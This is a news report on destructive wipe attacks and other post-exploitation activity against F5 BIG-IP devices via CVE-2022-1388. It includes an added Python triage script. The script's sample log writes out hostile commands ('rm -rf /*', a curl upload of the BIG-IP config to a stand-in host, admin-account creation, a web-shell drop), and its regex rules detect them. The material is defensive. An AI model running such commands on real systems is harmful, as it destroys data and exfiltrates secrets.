A recently disclosed F5 BIG-IP vulnerability is being used in destructive attacks that attempt to wipe a device's file system and render the server unusable.
Last week, F5 disclosed a vulnerability tracked as CVE-2022-1388 that allows attackers to remotely execute commands on BIG-IP network devices as 'root' without authentication. Due to the critical nature of the bug, F5 urged administrators to apply updates as soon as possible.
A few days later, researchers began posting exploits publicly on Twitter and GitHub, and threat actors were soon using them in attacks on the Internet.
While most of the attacks were used to drop web shells for initial access to networks, steal SSH keys, and enumerate system information, the SANS Internet Storm Center observed two attacks targeting BIG-IP devices in a far more nefarious way.
SANS told BleepingComputer that their honeypots saw two attacks coming from IP address 177.54.127[.]111 running the command 'rm -rf /*' on the target BIG-IP device.
When run, this command attempts to delete every file on the BIG-IP device's Linux file system.
Because the exploit gives attackers root privileges on the Linux operating system that powers BIG-IP devices, the rm -rf /* command can delete almost any file, including the configuration files the device needs to work properly.
After we published our story, security researcher Kevin Beaumont confirmed that devices were being wiped tonight.
"Can confirm. Real world devices are being wiped tonight, many on Shodan are unresponsive," tweeted Beaumont.
Fortunately, these destructive attacks do not appear to be widespread, with most threat actors looking to profit from breaching the devices rather than causing damage.
Cybersecurity threat intelligence firms Bad Packets and GreyNoise told BleepingComputer that they had not seen any destructive attacks on their honeypots.
GreyNoise researcher kimber said they commonly see the exploits drop web shells, exfiltrate configurations, or run commands to create administrator accounts on the devices.
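The post-exploitation behaviours reported above (the rm -rf /* wipe SANS observed, and the web-shell drops, configuration exfiltration and administrator-account creation GreyNoise describes) can be turned into triage rules for a command audit log, so that a wipe attempt is surfaced ahead of the noisier activity. The script below is an added example and is not code from the article, SANS, GreyNoise or F5. The log format is hypothetical, the web-root path is a placeholder, and every sample line except the reported command and source IP is constructed; /config/bigip.conf and /config/bigip_base.conf are the real BIG-IP configuration files.

```python
import re
from dataclasses import dataclass

# Constructed sample audit lines in a hypothetical format: timestamp, source IP, executed command.
# The first line reproduces the destructive command SANS reported, from the IP named in the
# article; every other line is invented for illustration.
SAMPLE_LOG = """\
2022-05-09T21:14:02Z src=177.54.127.111 cmd="rm -rf /*"
2022-05-09T21:15:37Z src=203.0.113.10 cmd="cat /config/bigip.conf"
2022-05-09T21:16:11Z src=203.0.113.10 cmd="curl -s -X POST http://203.0.113.10/up -d @/config/bigip.conf"
2022-05-09T21:18:45Z src=198.51.100.7 cmd="tmsh create auth user backup-svc password PLACEHOLDER role admin"
2022-05-09T21:20:03Z src=198.51.100.7 cmd="echo PLACEHOLDER_PAYLOAD > /path/to/webroot/x.jsp"
2022-05-09T21:22:50Z src=192.0.2.4 cmd="id"
2022-05-09T21:23:10Z src=10.0.0.5 cmd="rm -rf /var/tmp/build-cache"
"""

LINE_RE = re.compile(r'^(?P<ts>\S+)\s+src=(?P<src>\S+)\s+cmd="(?P<cmd>.*)"$')

# One detection rule per behaviour named in the article.
RULES = [
    # rm with any flags aimed at "/" or "/*" (a subdirectory such as /var/tmp/... does not match)
    ("destructive_wipe", re.compile(r'\brm\s+(-\S+\s+)*/\*?(\s|$)')),
    # reads or uploads of the main BIG-IP configuration files
    ("config_exfil", re.compile(r'/config/bigip(_base)?\.conf\b')),
    # local account creation via the OS or via tmsh
    ("admin_account", re.compile(r'\b(useradd|adduser)\b|\btmsh\s+create\s+/?auth\s+user\b')),
    # shell output or a download redirected into a web-servable script file
    ("webshell_drop", re.compile(r'(>|-o)\s*\S+\.(jsp|jspx|php|war|aspx)\b')),
]


@dataclass(frozen=True)
class Finding:
    ts: str
    src: str
    cmd: str
    tags: tuple
    severity: str


def classify(cmd: str) -> tuple:
    """Return the names of every rule the command matches, in rule order."""
    return tuple(name for name, rx in RULES if rx.search(cmd))


def triage(log_text: str) -> list:
    """Parse each audit line and attach behaviour tags plus a severity."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than abort the whole run
        tags = classify(m["cmd"])
        if not tags:
            sev = "info"
        else:
            # a file-system wipe outranks everything else: the device may be minutes from dead
            sev = "critical" if "destructive_wipe" in tags else "high"
        findings.append(Finding(m["ts"], m["src"], m["cmd"], tags, sev))
    return findings


def wipe_sources(findings) -> set:
    """Source addresses that issued a wipe; block these first and preserve the device for forensics."""
    return {f.src for f in findings if f.severity == "critical"}


if __name__ == "__main__":
    results = triage(SAMPLE_LOG)
    for f in results:
        print(f"{f.severity:8} {f.src:16} {','.join(f.tags) or '-':16} {f.cmd}")
    print("wipe sources:", wipe_sources(results))
```

The rules deliberately key on the command rather than on the exploit request, so they keep working whichever public exploit variant delivered the command; the wipe rule matches only a root-level target so routine cleanup of temporary directories stays at "info".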
While the destructive attacks seen by SANS may be rare, the fact that they happen at all should be the only incentive an administrator needs to update their devices to the latest patch levels.
When we contacted F5 about these destructive attacks, they told BleepingComputer that they are in contact with SANS and strongly advise administrators never to expose the BIG-IP management interface to the Internet.
"We have been in contact with SANS and are investigating the issue. If customers have not already done so, we are urging them to update to a fixed version of BIG-IP or implement one of the mitigations outlined in the security advisory. We strongly recommend that customers never expose their BIG-IP management interface (TMUI) to the public internet and ensure the appropriate controls are in place to limit access." – F5
It is important to note, however, that Beaumont found that the attacks also affect devices on non-management ports if they are configured incorrectly.
For those affected by attacks on their BIG-IP devices, F5 told BleepingComputer that their Security Incident Response Team is available 24 hours a day, seven days a week and can be contacted at (888) 882-7535, (800) 11-275-435, or online.
For F5 BIG-IP administrators who are concerned that their devices have already been compromised, Sandfly Security founder Craig Rowland is offering trial licenses that let them check their devices.
Update 5/10/22: Added confirmation from Kevin Beaumont.